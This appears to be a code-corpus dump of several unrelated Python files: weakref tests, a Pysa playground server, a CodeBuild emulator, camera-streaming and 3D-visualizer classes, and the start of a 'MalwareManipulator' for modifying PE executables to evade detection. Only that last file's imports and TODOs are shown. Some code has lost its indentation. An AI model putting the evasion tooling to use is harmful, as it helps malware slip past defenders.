# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(50000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(50000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
    """Check that WeakValueDictionary conforms to the mapping protocol"""
    # Class-level dict holds strong references so the weakly-referenced
    # values stay alive for the duration of the protocol tests.
    __ref = {"key1": Object(1), "key2": Object(2), "key3": Object(3)}
    type2test = weakref.WeakValueDictionary

    def _reference(self):
        # Return a copy so the protocol tests cannot mutate the originals.
        return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
    """Check that WeakKeyDictionary conforms to the mapping protocol"""
    # Class-level dict holds strong references so the weakly-referenced
    # keys stay alive for the duration of the protocol tests.
    __ref = {Object("key1"): 1, Object("key2"): 2, Object("key3"): 3}
    type2test = weakref.WeakKeyDictionary

    def _reference(self):
        # Return a copy so the protocol tests cannot mutate the originals.
        return self.__ref.copy()
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print r() is obj
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print r()
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super(ExtendedRef, self).__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.iteritems():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super(ExtendedRef, self).__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print 'OK'
... else:
... print 'WeakValueDictionary error'
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
    """Run all unittest test cases, then the doctests embedded in this
    module (the libreftest examples registered via __test__)."""
    test_support.run_unittest(
        ReferencesTestCase,
        MappingTestCase,
        WeakValueDictionaryTestCase,
        WeakKeyDictionaryTestCase,
        SubclassableWeakrefTestCase,
    )
    test_support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
application.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import argparse
import json
import logging
import os
import subprocess
import tempfile
import threading
from pathlib import Path
from typing import IO, List
from flask import Flask, request, jsonify
from flask_cors import CORS
from flask_socketio import SocketIO, emit
logging.basicConfig(
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.DEBUG,
)
LOG: logging.Logger = logging.getLogger(__name__)
CUSTOM_PYSA_MODEL_FILE: str = "custom.pysa"
WATCHMAN_CONFIG_FILE: str = ".watchmanconfig"
PYRE_CONFIG_FILE: str = ".pyre_configuration"
INPUT_FILE: str = "input.py"
def _consume(stream: IO[str]) -> str:
    """Drain *stream* on a worker thread, logging each stripped line, and
    return the stripped lines joined with newlines."""
    collected: List[str] = []

    def _reader() -> None:
        # iter(readline, "") stops at EOF, exactly like the manual
        # while/readline loop it replaces.
        for raw in iter(stream.readline, ""):
            stripped = raw.strip()
            LOG.debug(stripped)
            collected.append(stripped)

    worker = threading.Thread(target=_reader)
    worker.start()
    worker.join()
    return "\n".join(collected)
class Pyre:
    """A throwaway Pyre type-checking project rooted in a fresh temporary
    directory, primed once at construction and re-checked per request."""

    def __init__(self) -> None:
        # One scratch directory per instance; nothing here cleans it up.
        self._directory: Path = Path(tempfile.mkdtemp())
        LOG.debug(f"Starting server in `{self._directory}`...")
        pyre_configuration = json.dumps(
            {
                "source_directories": ["."],
            }
        )
        LOG.debug(f"Writing configuration:\n{pyre_configuration}")
        pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
        pyre_configuration_path.write_text(pyre_configuration)
        LOG.debug("Writing watchman configuration")
        watchman_configuration_path = self._directory / WATCHMAN_CONFIG_FILE
        watchman_configuration_path.write_text("{}\n")
        LOG.debug("Starting watchman")
        subprocess.check_call(["watchman", "watch", str(self._directory)])
        LOG.debug("Priming the server")
        # TODO(T82114844): incremental is borked on Ubuntu 20.04.
        subprocess.check_call(
            ["pyre", "--noninteractive", "check"], cwd=self._directory
        )

    def check(self, input: str) -> str:
        """Write *input* as the project's source file, run `pyre check`,
        and return a JSON response with the resulting errors.

        NOTE(review): despite the `-> str` annotation this returns the
        Flask response object built by jsonify() — confirm callers.
        """
        LOG.debug("Running pyre check")
        code_path = self._directory / INPUT_FILE
        code_path.write_text(input)
        # TODO(T82114844): incremental is borked on Ubuntu 20.04.
        with subprocess.Popen(
            ["pyre", "--output=json", "--noninteractive", "check"],
            stderr=subprocess.PIPE,
            stdout=subprocess.PIPE,
            cwd=self._directory,
            text=True,
        ) as process:
            # pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
            # `Optional[IO[typing.Any]]`.
            stderr = _consume(process.stderr)
            # pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
            # `Optional[IO[typing.Any]]`.
            stdout = _consume(process.stdout)
            return_code = process.wait()
            # Exit codes above 1 are treated as a crash of pyre itself;
            # presumably 1 means "type errors found" — verify against
            # pyre's exit-code convention.
            if return_code > 1:
                LOG.error(f"Returning error: {stderr}")
                result = jsonify(errors=[stderr])
            else:
                errors = json.loads(stdout)
                result = jsonify(data={"errors": errors, "stderr": stderr})
        return result
class Pysa:
    """Sets up a Pysa (taint analysis) project in a temporary directory and
    streams analysis output to the client over the socket.io channel."""

    def __init__(
        self, input: str, model: str = "", use_builtin_pysa_models: bool = False
    ) -> None:
        # Separate scratch directories for the source tree and the stubs /
        # taint models; neither is cleaned up here.
        self._directory: Path = Path(tempfile.mkdtemp())
        self._stubs: Path = Path(tempfile.mkdtemp())
        LOG.debug(f"Intializing Pysa in `{self._directory}`...")
        pyre_configuration = json.dumps(
            {
                "source_directories": ["."],
                # Only include the server's built-in taint models on request.
                "taint_models_path": [
                    str(self._stubs),
                    os.environ["PYSA_PLAYGROUND_TAINT_MODELS"],
                ]
                if use_builtin_pysa_models
                else str(self._stubs),
                "search_path": [str(self._stubs), os.environ["PYSA_PLAYGROUND_STUBS"]],
            }
        )
        LOG.debug(f"Writing configuration:\n{pyre_configuration}")
        pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
        pyre_configuration_path.write_text(pyre_configuration)
        if model:
            LOG.debug("Writing custom model to pysa file")
            model_path = self._stubs / CUSTOM_PYSA_MODEL_FILE
            model_path.write_text(model)
        LOG.debug(f"Writing code:\n{input}")
        code_path = self._directory / INPUT_FILE
        code_path.write_text(input)

    def analyze(self) -> None:
        """Run `pyre analyze`, emitting each log line (model-verification
        errors batched) and a final status on `pysa_results_channel`."""
        LOG.debug("Running pysa")
        with subprocess.Popen(
            ["pyre", "-n", "analyze"],
            stderr=subprocess.PIPE,
            stdout=subprocess.PIPE,
            cwd=self._directory,
            text=True,
        ) as process:
            model_verification_errors: List[str] = []
            # BUG FIX: with text=True, readline() yields str and returns ""
            # at EOF, so the iter() sentinel must be "" — the previous b""
            # sentinel could never equal a str line, leaving termination to
            # the blank-line break alone.
            for line in iter(process.stderr.readline, ""):
                line = line.rstrip()
                if line == "":
                    break
                elif "ERROR" in line and "is not part of the environment" in line:
                    model_verification_errors.append(line)
                elif "INFO" in line or "ERROR" in line:
                    if model_verification_errors:
                        # Emit all model verification lines together to prevent
                        # network overhead.
                        model_verification_error_output = "\n".join(
                            model_verification_errors
                        )
                        emit(
                            "pysa_results_channel",
                            {
                                "type": "output",
                                "line": model_verification_error_output,
                            },
                        )
                        LOG.debug(model_verification_error_output)
                        model_verification_errors = []
                    emit("pysa_results_channel", {"type": "output", "line": line})
                    LOG.debug(line)
            return_code = process.wait()
            if return_code != 0:
                result = {"type": "finished", "result": "error"}
            else:
                result = {"type": "finished", "result": "ok"}
            emit("pysa_results_channel", result)
application = Flask(__name__)
# You may need to modify the origin to the pyre-check website
# before deployment.
CORS(application)
socketio = SocketIO(application, cors_allowed_origins="*")
@application.route("/check", methods=["GET", "POST"])
def check() -> str:
    """Type-check the code in the `input` field (query string, form body,
    or JSON body) and return the errors as JSON."""
    # ROBUSTNESS FIX: request.json raises a 400 BadRequest when the body is
    # not JSON; get_json(silent=True) returns None instead, so non-JSON
    # POSTs and plain GETs fall through to the "not provided" response.
    json_body = request.get_json(silent=True) or {}
    input = (
        request.args.get("input")
        or request.form.get("input")
        or json_body.get("input")
    )
    if input is None:
        return jsonify(errors=["Input not provided"])
    LOG.info(f"Checking `{input}`...")
    pyre = Pyre()
    return pyre.check(input)
@socketio.on("analyze", namespace="/analyze")
def analyze(json) -> None:
    """Socket.io handler: run a Pysa analysis on the payload's `input`
    code, with an optional custom `model` and built-in model toggle.

    NOTE(review): the `json` parameter (the socket.io payload dict)
    shadows the module-level `json` import inside this handler.
    """
    input = json.get("input", None)
    use_builtin_pysa_models = json.get("use_builtin_pysa_models", False)
    model = json.get("model", "")
    if input is None:
        # No code to analyze: report failure on the results channel.
        emit(
            "pysa_results_channel",
            {
                "type": "finished",
                "result": "error",
                "reason": "No code given to analyze.",
            },
        )
    else:
        pysa = Pysa(input, model, use_builtin_pysa_models)
        LOG.info(f"Checking `{input}`...")
        pysa.analyze()
@application.route("/")
def index() -> str:
    """Root route: nothing is served here, so answer with a 404 marker."""
    return "404"
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
arguments: argparse.Namespace = parser.parse_args()
socketio.run(application, debug=arguments.debug)
|
codebuild_emulator.py |
import os
from os.path import join
import tempfile
import shutil
import json
import boto3
import docker
import time
import threading
import sys
cwd = os.getcwd()
target = join(cwd, 'artifacts')
default_script_path = join(os.path.dirname(os.path.realpath(__file__)), 'codebuild_builder.py')
class CodebuildEmulator:
    """Fetches an AWS CodeBuild project definition and runs a build for it
    locally in Docker via CodebuildRun."""

    def __init__(self,
                 docker_version,
                 codebuild_client=None,
                 sts_client=None,
                 assume_role=True,
                 debug=False,
                 override=None,
                 pull_image=False):
        # BUG FIX: the previous defaults called boto3.client(...) in the
        # signature, creating AWS clients at import time (and failing on
        # hosts without AWS configuration even when callers supplied their
        # own clients), and shared one mutable {} across all instances.
        # None sentinels keep the interface backward-compatible.
        self._docker_version = docker_version
        self._codebuild_client = codebuild_client if codebuild_client is not None else boto3.client('codebuild')
        self._sts_client = sts_client if sts_client is not None else boto3.client('sts')
        self._assume_role = assume_role
        self._debug = debug
        self._override = override if override is not None else {}
        self._pull_image = pull_image

    def _get_project(self, project_name):
        """Return the CodeBuild project definition, or raise if missing."""
        response = self._codebuild_client.batch_get_projects(names=[project_name])
        projects = response['projects']
        if projects:
            return projects[0]
        else:
            raise Exception("No project found")

    def run(self, configuration, input_src=cwd, target_dir=target):
        """Execute one build: stage sources into a temp work dir, run the
        container, copy artifacts to *target_dir*, and return the build's
        exit code."""
        project = self._get_project(configuration['ProjectName'])
        work_dir = tempfile.mkdtemp()
        run = CodebuildRun(project, input_src, work_dir,
                           self._sts_client, self._docker_version,
                           assume_role=self._assume_role,
                           debug=self._debug,
                           override=self._override,
                           pull_image=self._pull_image)
        run.assume_role()
        run.prepare_dirs()
        run.run_container()
        exit_code = run.wait_for_container()
        run.copy_artifacts(target_dir)
        shutil.rmtree(work_dir, ignore_errors=True)
        return exit_code
class CodebuildRun:
    """One local execution of a CodeBuild project: stages inputs into a
    read-only tree, runs the build container, and collects artifacts."""

    def __init__(self,
                 project,
                 input_src,
                 work_dir,
                 sts_client=None,
                 docker_version='auto',
                 assume_role=True,
                 debug=False,
                 override=None,
                 pull_image=False):
        # BUG FIX: boto3.client('sts') used to be evaluated in the
        # signature at import time, and override={} was one shared mutable
        # dict; None sentinels keep the interface backward-compatible.
        self._project = project
        self._input_src = input_src
        self._work_dir = work_dir
        self._sts_client = sts_client if sts_client is not None else boto3.client('sts')
        self._docker_version = docker_version
        self._assume_role = assume_role
        self._debug = debug
        self._override = override if override is not None else {}
        self._pull_image = pull_image

    def assume_role(self):
        """Populate AWS credentials, either by assuming the project's
        service role or from the local default boto3 session."""
        if self._assume_role:
            service_role = self._project['serviceRole']
            assume = self._sts_client.assume_role(RoleArn=service_role,
                                                  RoleSessionName='codebuild-emulator')
            self._access_key_id = assume['Credentials']['AccessKeyId']
            self._secret_access_key = assume['Credentials']['SecretAccessKey']
            self._session_token = assume['Credentials']['SessionToken']
        else:
            creds = boto3.Session().get_credentials()
            self._access_key_id = creds.access_key
            self._secret_access_key = creds.secret_key
            self._session_token = creds.token
        self._region_name = boto3.Session().region_name

    def prepare_dirs(self):
        """Lay out the read-only input tree (executor script, sources,
        environment variables, buildspec) and the writable output dir."""
        readonly = join(self._work_dir, 'codebuild', 'readonly')
        os.makedirs(readonly)
        self._readonly_dir = readonly
        bin_dir = join(readonly, 'bin')
        os.mkdir(bin_dir)
        executor_path = join(bin_dir, 'executor')
        shutil.copy2(default_script_path, executor_path)
        # BUG FIX: the mode was the decimal literal 500 (== 0o764,
        # rwxrw-r--); the octal r-x owner-only mode was clearly intended.
        os.chmod(executor_path, 0o500)
        src = join(readonly, 'src')
        shutil.copytree(self._input_src, src)
        with open(join(readonly, 'variables.json'), 'w') as varsfile:
            env_vars = self._get_env_vars()
            json.dump(env_vars, varsfile)
        buildspec = self._get_buildspec()
        buildspec_dest = join(readonly, 'buildspec.yml')
        if buildspec.startswith('version: '):
            # Inline buildspec content straight from the project definition.
            with open(buildspec_dest, 'w') as buildspecfile:
                buildspecfile.write(buildspec)
        else:
            # Otherwise it names a file relative to the source tree.
            buildspec_src = join(src, buildspec)
            if os.path.exists(buildspec_src):
                shutil.copy2(buildspec_src, buildspec_dest)
            else:
                raise Exception("No buildspec provided")
        output_dir = join(self._work_dir, 'codebuild', 'output')
        os.mkdir(output_dir)
        self._output_dir = output_dir
        self._debug_file = join(output_dir, 'debug')
        if self._debug:
            # Presence of this file enables interactive debugging in
            # _wait_for_input.
            open(self._debug_file, 'a').close()

    def run_container(self):
        """Start the build container detached with the staged volumes and
        AWS credentials in its environment."""
        image = self._project['environment']['image']
        volumes = {self._readonly_dir: {'bind': '/codebuild/readonly', 'mode': 'ro'},
                   self._output_dir: {'bind': '/codebuild/output', 'mode': 'rw'}}
        command = '/codebuild/readonly/bin/executor'
        environment = {'AWS_ACCESS_KEY_ID': self._access_key_id,
                       'AWS_SECRET_ACCESS_KEY': self._secret_access_key,
                       'AWS_SESSION_TOKEN': self._session_token,
                       'AWS_DEFAULT_REGION': self._region_name,
                       'CBEMU_UID': os.getuid(),
                       'CBEMU_GID': os.getgid()}
        # Docker-in-docker images need privileged mode even if the project
        # definition does not request it.
        privileged_mode = self._project['environment']['privilegedMode'] or image.startswith('aws/codebuild/docker')
        docker_client = docker.from_env(version=self._docker_version)
        if self._pull_image:
            print('Pulling %s' % image)
            docker_client.images.pull(name=image)
        container = docker_client.containers.run(image=image,
                                                 volumes=volumes,
                                                 command=command,
                                                 environment=environment,
                                                 privileged=privileged_mode,
                                                 tty=True,
                                                 detach=True)
        self._container = container

    def wait_for_container(self):
        """Stream container logs to stdout until it exits; return its
        exit code."""
        if self._debug:
            run_thread = threading.Thread(target=self._wait_for_input)
            run_thread.daemon = True
            run_thread.start()
        while True:
            stream = self._container.logs(stdout=True, stderr=True, stream=True, follow=True)
            try:
                for c in stream:
                    sys.stdout.write(c)
                    sys.stdout.flush()
                    if c == '\n':
                        # Prefix each new line to mark container output.
                        sys.stdout.write('[Container] ')
                        sys.stdout.flush()
                break
            except Exception as e:
                # The log stream can drop; print the error and re-attach.
                print('\n' + '=' * 128)
                print(str(e))
                print('\n' + '=' * 128)
        if self._debug:
            run_thread.join(timeout=10)
        self._container.reload()
        while not self._container.status == 'exited':
            time.sleep(1)
        docker_api = docker.APIClient(version=self._docker_version)
        exit_code = docker_api.inspect_container(self._container.id)['State']['ExitCode']
        return exit_code

    def copy_artifacts(self, artifacts_target_dir):
        """Replace *artifacts_target_dir* with the container's artifacts
        output, if any were produced."""
        artifacts_source_dir = join(self._output_dir, 'artifacts')
        if os.path.exists(artifacts_source_dir):
            print("Artifacts are copied into " + artifacts_target_dir)
            shutil.rmtree(artifacts_target_dir, ignore_errors=True)
            shutil.copytree(artifacts_source_dir, artifacts_target_dir)

    def _get_buildspec(self):
        """Return the project's inline buildspec text, or the buildspec
        filename (default 'buildspec.yml')."""
        if 'buildspec' in self._project['source']:
            buildspec_raw = self._project['source']['buildspec'].strip()
            return str(buildspec_raw)
        else:
            return 'buildspec.yml'

    def _get_env_vars(self):
        """Build the environment dict from the project definition, with
        emulator-level overrides applied last."""
        raw_environment = self._project['environment']['environmentVariables']
        environment = {}
        # `item` instead of shadowing the builtin `tuple`.
        for item in raw_environment:
            key = item['name']
            value = item['value']
            environment[key] = value
        # .items() (not .iteritems()) works on Python 2 and 3 alike.
        for env, val in self._override.items():
            print('Overriding %s with %s' % (env, val))
            environment[env] = val
        return environment

    def _wait_for_input(self):
        """Debug helper: when the debug marker file exists, read stdin;
        'S' drops a 'skip' marker for the executor and clears the flag."""
        while True:
            while not os.path.exists(self._debug_file):
                time.sleep(1)
            time.sleep(1)
            value = raw_input('')
            if value == 'S':
                open(join(self._output_dir, 'skip'), 'a').close()
                os.unlink(self._debug_file)
|
livestream.py | # _____ ______ _____
# / ____/ /\ | ____ | __ \
# | | / \ | |__ | |__) | Caer - Modern Computer Vision
# | | / /\ \ | __| | _ / Languages: Python, C, C++
# | |___ / ____ \ | |____ | | \ \ http://github.com/jasmcaus/caer
# \_____\/_/ \_ \______ |_| \_\
# Licensed under the MIT License <http://opensource.org/licenses/MIT>
# SPDX-License-Identifier: MIT
# Copyright (c) 2020-2021 The Caer Authors <http://github.com/jasmcaus>
#pylint:disable=no-member,pointless-string-statement
from threading import Thread
import math
import cv2 as cv
from .constants import FPS
__all__ = [
'LiveStream'
]
"""
Python threading has a specific meaning for daemon. A daemon thread will shut down immediately when the program exits. One way to think about these definitions is to consider the daemon thread a thread that runs in the background without worrying about shutting it down.
If a program is running Threads that are not daemons, then the program will wait for those threads to complete before it terminates. Threads that are daemons, however, are just killed wherever they are when the program is exiting.
"""
# This class can only handle live video streams. When applied to pre-existing videos, there appears
# to be an issue with Threading. As a result, the video plays through at a high (almost 4x) speed.
# This issue has been marked and will be fixed in a future update.
class LiveStream:
    r"""
    Auxiliary class that enables live video streaming for caer with minimal
    latency, at the expense of little to no additional computational
    requirements. Frames are read continuously on a daemon thread
    (**Threaded Queue mode**) so ``read()`` always returns the latest frame.

    Args:
        source (int): Source index for the video. If ``source=0``, the default
            camera device is used. For multiple external camera devices, use
            incremented values, e.g. ``source=1`` is the second camera.
    """

    def __init__(self, source=0):
        r"""
        Source must be an integer (0, 1, 2, ...); file paths are rejected
        because this class only supports live streams.
        """
        if isinstance(source, str):
            raise ValueError('Expected an integer. Got a filepath. LiveVideoStream is for live streams only')

        # Initializing the video stream
        self.stream = cv.VideoCapture(source)
        # Grab an initial frame eagerly so read() has data before the
        # update() thread starts.
        self.ret, self.frame = self.stream.read()

        self.width = int(self.stream.get(cv.CAP_PROP_FRAME_WIDTH))
        self.height = int(self.stream.get(cv.CAP_PROP_FRAME_HEIGHT))
        self.res = (self.width, self.height)
        self.fps = math.ceil(self.stream.get(FPS))

        # Initializing the thread name
        self.thread_name = 'DefaultVideoStream'

        # Boolean to check whether stream should be killed
        self.kill_stream = False

    def begin_stream(self):
        """Start the daemon thread that keeps ``self.frame`` current."""
        thread = Thread(target=self.update, name=self.thread_name, args=())
        thread.daemon = True
        thread.start()
        return self

    def read(self):
        """Return the most recently captured frame."""
        return self.frame

    def update(self):
        # Continuously overwrite self.frame until release() is called.
        while not self.kill_stream:
            self.ret, self.frame = self.stream.read()

    def release(self):
        """Stop the update loop and release the underlying video capture.

        Bug fix: the original only set the flag and never freed the video
        pointer, despite the comment claiming it did. A read() racing the
        release is harmless: OpenCV returns (False, None) on a released
        capture.
        """
        self.kill_stream = True
        self.stream.release()

    # Counting frames is not applicable for live video.

    def get_fps(self):
        """Return the capture's reported FPS (rounded up) while active."""
        if not self.kill_stream:
            return self.fps

    def get_res(self):
        """Return the capture resolution as a (width, height) tuple."""
        return self.res
open3d_utils.py | # global
import ivy
import threading
import numpy as np
import open3d as o3d
# noinspection PyCallByClass
class Visualizer:
    """Interactive open3d visualizer for point clouds and voxel grids.

    Geometry is created on the first call and updated in place afterwards
    (tracked via ``self._first_pass``). Each ``show_*`` call blocks, polling
    the window until the operator presses enter in the terminal.
    """

    def __init__(self, cam_ext_mat=None):
        # visualizer
        self._vis = o3d.visualization.Visualizer()
        self._vis.create_window()
        # visualizer control
        self._ctr = self._vis.get_view_control()
        # Optional camera extrinsic matrix; when given, the view is set from
        # it once on the first show_* call.
        self._cam_ext_mat = cam_ext_mat
        self._first_pass = True
        # No extrinsics supplied -> nothing to initialize, mark as done.
        self._cam_pose_initialized = True if cam_ext_mat is None else False

    # Private #

    def _wait_for_enter(self):
        # Runs on a helper thread; flips the flag the poll loop watches.
        # (note: attribute name is spelled "_pressend_enter" throughout)
        input('press enter to continue...')
        self._pressend_enter = True

    def _listen_for_enter_in_thread(self):
        self._pressend_enter = False
        self._thread = threading.Thread(target=self._wait_for_enter)
        self._thread.start()

    def _join_enter_listener_thread(self):
        self._thread.join()

    # Public #

    def show_point_cloud(self, xyz_data, rgb_data, interactive, sphere_inv_ext_mats=None, sphere_radii=None):
        """Render a colored point cloud, plus optional marker spheres.

        Blocks until enter is pressed when *interactive* is truthy;
        otherwise returns immediately. xyz_data/rgb_data are reshaped to
        (-1, 3), so any leading batch dims are flattened.
        """
        if not interactive:
            return
        vectors = o3d.utility.Vector3dVector(np.reshape(ivy.to_numpy(xyz_data), (-1, 3)))
        color_vectors = o3d.utility.Vector3dVector(np.reshape(ivy.to_numpy(rgb_data), (-1, 3)))
        sphere_inv_ext_mats = list() if sphere_inv_ext_mats is None else sphere_inv_ext_mats
        sphere_radii = list() if sphere_radii is None else sphere_radii
        if self._first_pass:
            # create point cloud
            self._point_cloud = o3d.geometry.PointCloud(vectors)
            self._point_cloud.colors = color_vectors
            self._vis.clear_geometries()
            self._vis.add_geometry(o3d.geometry.TriangleMesh.create_coordinate_frame(0.15, [0., 0., 0.]), True)
            self._vis.add_geometry(self._point_cloud, True)
            # spheres
            self._spheres = list()
            for sphere_inv_ext_mat, sphere_rad in zip(sphere_inv_ext_mats, sphere_radii):
                sphere = o3d.geometry.TriangleMesh.create_sphere(sphere_rad)
                sphere.paint_uniform_color(np.array([[0.], [0.], [0.]]))
                sphere.transform(sphere_inv_ext_mat)
                self._spheres.append(sphere)
                self._vis.add_geometry(sphere, True)
        else:
            # update point cloud in place rather than re-adding geometry
            self._point_cloud.points = vectors
            self._point_cloud.colors = color_vectors
            self._vis.update_geometry(self._point_cloud)
            for sphere, sphere_inv_ext_mat in zip(self._spheres, sphere_inv_ext_mats):
                sphere.transform(sphere_inv_ext_mat)
                self._vis.update_geometry(sphere)
        # camera matrix: applied once, on the first show after construction
        if not self._cam_pose_initialized:
            cam_params = o3d.camera.PinholeCameraParameters()
            cam_params.extrinsic = self._cam_ext_mat
            cam_params.intrinsic = self._ctr.convert_to_pinhole_camera_parameters().intrinsic
            self._ctr.convert_from_pinhole_camera_parameters(cam_params)
            self._cam_pose_initialized = True
        # update flag
        self._first_pass = False
        # spin visualizer until key-pressed
        self._listen_for_enter_in_thread()
        while not self._pressend_enter:
            self._vis.poll_events()
        self._join_enter_listener_thread()
        # reset spheres to origin so the next call's transform starts clean
        for sphere, sphere_inv_ext_mat in zip(self._spheres, sphere_inv_ext_mats):
            sphere.transform(np.linalg.inv(sphere_inv_ext_mat))

    # noinspection PyArgumentList
    def show_voxel_grid(self, voxels, interactive, cuboid_inv_ext_mats=None, cuboid_dims=None):
        """Render an occupancy voxel grid as one merged box mesh.

        *voxels* is indexed as: [0] grid data with rgb at channels 3:6 and
        occupancy in the last channel, [2] per-axis voxel resolution,
        [3] grid minimum corner — assumed from the indexing below; TODO
        confirm against the producer of this structure.
        """
        if not interactive:
            return
        cuboid_inv_ext_mats = list() if cuboid_inv_ext_mats is None else cuboid_inv_ext_mats
        cuboid_dims = list() if cuboid_dims is None else cuboid_dims
        voxel_grid_data = ivy.to_numpy(voxels[0])
        res = ivy.to_numpy(voxels[2])
        bb_mins = ivy.to_numpy(voxels[3])
        rgb_grid = voxel_grid_data[..., 3:6]
        occupancy_grid = voxel_grid_data[..., -1:]
        boxes = list()
        # One box per occupied voxel, colored by the voxel's rgb value.
        for x, (x_slice, x_col_slice) in enumerate(zip(occupancy_grid, rgb_grid)):
            for y, (y_slice, y_col_slice) in enumerate(zip(x_slice, x_col_slice)):
                for z, (z_slice, z_col_slice) in enumerate(zip(y_slice, y_col_slice)):
                    if z_slice[0] > 0:
                        box = o3d.geometry.TriangleMesh.create_box(res[0], res[1], res[2])
                        box.vertex_colors = o3d.utility.Vector3dVector(np.ones((8, 3)) * z_col_slice)
                        xtrue = bb_mins[0] + res[0]*x
                        ytrue = bb_mins[1] + res[1]*y
                        ztrue = bb_mins[2] + res[2]*z
                        # center the box on the voxel
                        box.translate(np.array([xtrue, ytrue, ztrue]) - res/2)
                        boxes.append(box)
        # Merge all boxes into a single mesh (8 vertices per box, so the
        # i-th box's triangle indices are offset by i*8).
        all_vertices = np.concatenate([np.asarray(box.vertices) for box in boxes], 0)
        all_vertex_colors = np.concatenate([np.asarray(box.vertex_colors) for box in boxes], 0)
        all_triangles = np.concatenate([np.asarray(box.triangles) + i*8 for i, box in enumerate(boxes)], 0)
        final_mesh = o3d.geometry.TriangleMesh(o3d.utility.Vector3dVector(all_vertices),
                                               o3d.utility.Vector3iVector(all_triangles))
        final_mesh.vertex_colors = o3d.utility.Vector3dVector(all_vertex_colors)
        # add to visualizer
        self._vis.clear_geometries()
        self._vis.add_geometry(o3d.geometry.TriangleMesh.create_coordinate_frame(0.15, [0., 0., 0.]), self._first_pass)
        self._vis.add_geometry(final_mesh, self._first_pass)
        # cuboids
        self._cuboids = list()
        for cuboid_inv_ext_mat, cuboid_dim in zip(cuboid_inv_ext_mats, cuboid_dims):
            cuboid = o3d.geometry.TriangleMesh.create_box(cuboid_dim[0], cuboid_dim[1], cuboid_dim[2])
            cuboid.translate(-cuboid_dim/2)
            cuboid.paint_uniform_color(np.array([[0.], [0.], [0.]]))
            cuboid.transform(cuboid_inv_ext_mat)
            self._cuboids.append(cuboid)
            self._vis.add_geometry(cuboid, self._first_pass)
        # camera matrix: applied once, on the first show after construction
        if not self._cam_pose_initialized:
            cam_params = o3d.camera.PinholeCameraParameters()
            cam_params.extrinsic = self._cam_ext_mat
            cam_params.intrinsic = self._ctr.convert_to_pinhole_camera_parameters().intrinsic
            self._ctr.convert_from_pinhole_camera_parameters(cam_params)
            self._cam_pose_initialized = True
        # update flag
        self._first_pass = False
        # spin visualizer until key-pressed
        self._listen_for_enter_in_thread()
        while not self._pressend_enter:
            self._vis.poll_events()
        self._join_enter_listener_thread()
|
manipulate2.py | # TODO:
# * modify exports using lief
# * zero out rich header (if it exists) --> requires updating OptionalHeader's checksum ("Rich Header" only in Microsoft-produced executables)
# * tinker with resources: https://lief.quarkslab.com/doc/tutorials/07_pe_resource.html
import lief # pip install https://github.com/lief-project/LIEF/releases/download/0.7.0/linux_lief-0.7.0_py3.6.tar.gz
import json
import os
import sys
import array
import struct # byte manipulations
import random
import tempfile
import subprocess
import functools
import signal
import multiprocessing
import pickle
import pefile
import hashlib
module_path = os.path.split(os.path.abspath(sys.modules[__name__].__file__))[0]
COMMON_SECTION_NAMES = pickle.load(open(os.path.join(module_path, '../../../RL_Features/adversarial_sections_set.pk'), "rb"))
COMMON_IMPORTS = pickle.load(open(os.path.join(module_path, '../../../RL_Features/adversarial_imports_set.pk'), "rb"))
section_content = "manipulation_content/section-content.txt"
class MalwareManipulator(object):
    """Applies functionality-preserving transformations to a PE file's bytes.

    Each public action takes an optional RNG seed, mutates ``self.bytez``
    (the raw PE image) and returns the new bytes. Several actions shell out
    to external helper binaries via intermediate files on disk.
    """

    def __init__(self, bytez):
        self.bytez = bytez
        # log2 bounds for the byte count used by append-style actions
        self.min_append_log2 = 5
